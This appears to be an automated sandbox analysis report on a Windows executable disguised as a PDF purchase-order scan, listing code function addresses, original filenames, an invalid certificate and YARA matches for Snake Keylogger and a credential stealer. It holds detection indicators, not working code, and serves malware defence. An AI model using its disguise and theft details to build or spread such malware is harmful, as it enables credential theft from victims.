Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A6180	1_2_091A6180
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A3838	1_2_091A3838
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A40A8	1_2_091A40A8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A40A3	1_2_091A40A3
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A3C70	1_2_091A3C70
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A44DB	1_2_091A44DB
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 1_2_091A44E0	1_2_091A44E0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152C146	8_2_0152C146
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01525362	8_2_01525362
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152D278	8_2_0152D278
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152C468	8_2_0152C468
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152C738	8_2_0152C738
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152E988	8_2_0152E988
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_015269A0	8_2_015269A0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01523B95	8_2_01523B95
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152CA08	8_2_0152CA08
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01529DE0	8_2_01529DE0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152CCD8	8_2_0152CCD8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01526FC8	8_2_01526FC8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152CFAC	8_2_0152CFAC
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01523E09	8_2_01523E09
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152E97C	8_2_0152E97C
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_0152F961	8_2_0152F961
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_015229EC	8_2_015229EC
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_01523AA1	8_2_01523AA1
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C69548	8_2_05C69548
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6FC68	8_2_05C6FC68
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C69C70	8_2_05C69C70
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C65028	8_2_05C65028
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6DDF1	8_2_05C6DDF1
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6D999	8_2_05C6D999
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6D9A8	8_2_05C6D9A8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6D540	8_2_05C6D540
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6D550	8_2_05C6D550
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C62970	8_2_05C62970
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6D0F8	8_2_05C6D0F8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6CCA0	8_2_05C6CCA0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C60040	8_2_05C60040
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6F802	8_2_05C6F802
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6F810	8_2_05C6F810
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C65018	8_2_05C65018
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C60038	8_2_05C60038
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C69BF7	8_2_05C69BF7
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C68B91	8_2_05C68B91
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C68BA0	8_2_05C68BA0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C61BA8	8_2_05C61BA8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6F3A8	8_2_05C6F3A8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6F3B8	8_2_05C6F3B8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6EF51	8_2_05C6EF51
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6EF60	8_2_05C6EF60
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C61B77	8_2_05C61B77
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6EB08	8_2_05C6EB08
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C60B20	8_2_05C60B20
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C69328	8_2_05C69328
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C60B30	8_2_05C60B30
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6EAF8	8_2_05C6EAF8
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C62288	8_2_05C62288
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6E6AF	8_2_05C6E6AF
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6E6B0	8_2_05C6E6B0
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6E24A	8_2_05C6E24A
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6E258	8_2_05C6E258
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C62278	8_2_05C62278
Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Code function: 8_2_05C6DE00	8_2_05C6DE00
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F1980	9_2_087F1980
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F6C20	9_2_087F6C20
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F7EF0	9_2_087F7EF0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FCEE0	9_2_087FCEE0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F4240	9_2_087F4240
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F1218	9_2_087F1218
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FB2DC	9_2_087FB2DC
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F9B40	9_2_087F9B40
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FACE8	9_2_087FACE8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FCED0	9_2_087FCED0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087F9F78	9_2_087F9F78
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FD170	9_2_087FD170
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FD15F	9_2_087FD15F
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 9_2_087FA438	9_2_087FA438
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147C147	13_2_0147C147
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_01475362	13_2_01475362
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147D278	13_2_0147D278
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147C468	13_2_0147C468
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147C738	13_2_0147C738
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147E988	13_2_0147E988
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_014769A0	13_2_014769A0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147CA08	13_2_0147CA08
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_01479DE0	13_2_01479DE0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147CCD8	13_2_0147CCD8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_01476FC8	13_2_01476FC8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147CFA9	13_2_0147CFA9
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147F960	13_2_0147F960
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_0147E97B	13_2_0147E97B
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_014729EC	13_2_014729EC
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_01473AA1	13_2_01473AA1
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_01473E09	13_2_01473E09
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D1E80	13_2_069D1E80
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D17A0	13_2_069D17A0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D9C18	13_2_069D9C18
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DFC68	13_2_069DFC68
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D0B30	13_2_069D0B30
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D9328	13_2_069D9328
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D5028	13_2_069D5028
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D2968	13_2_069D2968
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DE6B0	13_2_069DE6B0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DE6A0	13_2_069DE6A0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DDE00	13_2_069DDE00
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D1E70	13_2_069D1E70
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D178F	13_2_069D178F
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DEF51	13_2_069DEF51
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DEF60	13_2_069DEF60
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DCCA0	13_2_069DCCA0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DDDFF	13_2_069DDDFF
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DD550	13_2_069DD550
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D9548	13_2_069D9548
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DD540	13_2_069DD540
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DEAF8	13_2_069DEAF8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DE258	13_2_069DE258
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DE24A	13_2_069DE24A
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D8B91	13_2_069D8B91
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DF3B8	13_2_069DF3B8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D8BA0	13_2_069D8BA0
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DEB08	13_2_069DEB08
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D0B20	13_2_069D0B20
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DD0F8	13_2_069DD0F8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DD0E8	13_2_069DD0E8
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D5018	13_2_069D5018
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DF810	13_2_069DF810
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D0006	13_2_069D0006
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DF802	13_2_069DF802
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069D0040	13_2_069D0040
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DD999	13_2_069DD999
Source: C:\Users\user\AppData\Roaming\QeSBxb.exe	Code function: 13_2_069DD9A8	13_2_069DD9A8

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: invalid certificate

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1468306324.000000000C380000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000001.00000002.1460284409.00000000034F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe, 00000008.00000002.3879917067.0000000001187000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Binary or memory string: OriginalFilenameUDRS.exe> vs Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.QeSBxb.exe.4828a58.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.QeSBxb.exe.47e5838.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.QeSBxb.exe.4828a58.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4e27af8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.QeSBxb.exe.47e5838.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000001.00000002.1461711306.0000000004AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1498814254.0000000004755000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe PID: 1036, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: QeSBxb.exe PID: 6708, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QeSBxb.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, N4HVLfQlWEtmNwYgDD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
